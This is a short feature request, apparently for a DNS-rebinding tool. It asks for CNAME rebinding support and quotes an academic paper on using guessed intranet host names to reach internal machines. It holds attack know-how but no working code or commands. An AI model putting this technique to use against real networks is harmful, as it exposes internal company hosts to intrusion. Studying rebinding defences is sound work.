Support for cnames #45
Description
Hello,
I was wondering if it would be possible to add support to rebind a domain to a cname. That would allow an attacker to access some internal hosts without knowing the internal IP address, p.e. wiki.companydomain.com.
This technique is described in this paper:
https://crypto.stanford.edu/dns/dns-rebinding.pdf
Spidering the Intranet.
The attacker need not specify
the target machine by IP address. Instead, the attacker
can guess the internal host name of the target, for example
hr.corp.company.com, and rebind attacker.com to a CNAME
record pointing to that host name. The client’s own recursive DNS resolver will complete the resolution and return
the IP address of the target. Intranet host names are often
guessable and occasionally disclosed publicly [30, 9]. This
technique obviates the need for the attacker to scan IP addresses to find an interesting target but does not work with
the multiple A record technique described in Section 3.1.